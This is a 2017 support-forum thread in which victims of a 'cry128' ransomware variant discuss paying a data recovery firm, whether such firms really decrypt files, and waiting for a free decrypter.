AL3918 0 Posted May 16, 2017 Report Share Posted May 16, 2017 CKWS.....I do not know how they decrypted. After I gave my credit card info to them, took a deep breath and hoped everything would turn out ok. I received an email from proven data that gave instructions on how to setup a remote connection for their technician. I could see the technician login remotely (screen turned black) and I could see the mouse pointer moving around going through my files. I didn't stare at the server the whole time....it was on a Friday and came into work on Monday and the pointer was still moving around...I don't know if one technician worked on my server or multiple......The technician had access to the ransom note so it is plausible they directly contacted them or they were able to decrypt on their own. I'm not sure. I don't like the idea of a hacker getting some kind of payment...but at the same time I had files....that represented thousands of hours of Autocad drafting that were unusable. It was not "worthless" to me since all my data was recovered and even though a handful of my clients got pissed off for the delay in our drafting production......if I couldn't get all my files back....most likely this could've closed down my company. Quote Link to post Share on other sites
Kevin Zoll 309 Posted May 16, 2017 Report Share Posted May 16, 2017 @AL3918 @CKWS Data Recovery companies are not decrypting encrypted files. Companies of this nature use forensic data recovery methods that recover the original unencrypted file from the hard drive. And yes, it can be quite expensive. Quote Link to post Share on other sites
Frank chen 0 Posted May 17, 2017 Report Share Posted May 17, 2017 Can we know how the progress of cry128 36b variant decrypter is now? I am about to graduate in 1 month and all my matlab code is encrypted. I am not sure if I should pay or wait for you guys to save me. @Kevin Zoll May god bless u Quote Link to post Share on other sites
chx 0 Posted May 17, 2017 Report Share Posted May 17, 2017 Like you victime of cry128 variant 36 bytes since 07/05/2017 l read the topic three times by day waiting patiently. Thx & good luck Quote Link to post Share on other sites
chx 0 Posted May 17, 2017 Report Share Posted May 17, 2017 Like you victime of cry128 variant 36 bytes since 07/05/2017 l read the topic three times by day waiting patiently. Thx & good luck Quote Link to post Share on other sites
kygiacomo 2 Posted May 17, 2017 Report Share Posted May 17, 2017 from what i have read on the emsisoft blog its gonna be nearly impossible to decrypt the files without getting some professionals that use forensic data recovery to get your files back or paying the ransom. i hope everyone has learned a valuble lesson here and updates their OS,makes back ups of files and gets the proper internet security such as emsisoft to protect your computers. i have emsisoft internet secuirty,zemana and malwarebtyes on my system and i have yet to get any malware,virsus or ransomware on my computer. 2 Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.